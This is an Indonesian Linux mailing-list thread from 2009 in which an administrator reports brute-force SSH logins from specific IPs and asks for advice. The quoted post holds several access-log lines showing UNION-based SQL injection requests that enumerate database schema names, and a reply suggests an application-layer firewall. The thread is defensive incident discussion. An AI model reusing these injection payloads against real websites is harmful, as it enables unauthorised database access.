ini problem di layer aplikasi. jadi sulusinya juga di aplikasi. bisa googling tentang layer7 firewall.
2009/7/30 Arief Yudhawarman <[email protected]>: > On Thu, Jul 30, 2009 at 01:54:22AM +0000, Arief Yudhawarman wrote: >> >> Dia mau masuk sebagai user dhan dan leqhi. >> Berdasarkan whois ip 114.58.x.x itu ip indosat sedangkan 70.84.178.x itu >> milik theplanet. Perlu dilaporkan ke pihak berwenang (indosat) tidak ? >> Belum pernah sih mengalami hal ini jadi belum tahu protap-nya. > > Tambahan lagi ada banyak serangan sql injection di > /var/log/htdocs/*access.log yang > berasal dari ip indosat di atas. > > 114.58.53.4 - - [21/Jul/2009:15:22:32 +0700] "GET > /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 > x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 > 6368656d61+LIMIT+1,1-- HTTP/1.1" 200 4716 > 114.58.53.4 - - [21/Jul/2009:15:22:33 +0700] "GET > /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 > x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 > 6368656d61+LIMIT+2,1-- HTTP/1.1" 200 4714 > 114.58.53.4 - - [21/Jul/2009:15:22:34 +0700] "GET > /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 > x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 > 6368656d61+LIMIT+3,1-- HTTP/1.1" 200 4724 > 114.58.53.4 - - [21/Jul/2009:15:22:35 +0700] "GET > /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 > x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 > 6368656d61+LIMIT+4,1-- HTTP/1.1" 200 4712 > 114.58.53.4 - - [21/Jul/2009:15:22:36 +0700] "GET > /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 > x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 > 6368656d61+LIMIT+5,1-- HTTP/1.1" 200 4717 > > Keliatannya perlu patch kernel dengan limit connection untuk iptables nich. > > -- > > Terimakasih sebelumnya. > > Salam, > > ~~ Arief Yudhawarman ~~ > > > -- > FAQ milis di http://wiki.linux.or.id/FAQ_milis_tanya-jawab > Unsubscribe: kirim email ke [email protected] > Arsip dan info milis selengkapnya di http://linux.or.id/milis > > -- FAQ milis di http://wiki.linux.or.id/FAQ_milis_tanya-jawab Unsubscribe: kirim email ke [email protected] Arsip dan info milis selengkapnya di http://linux.or.id/milis
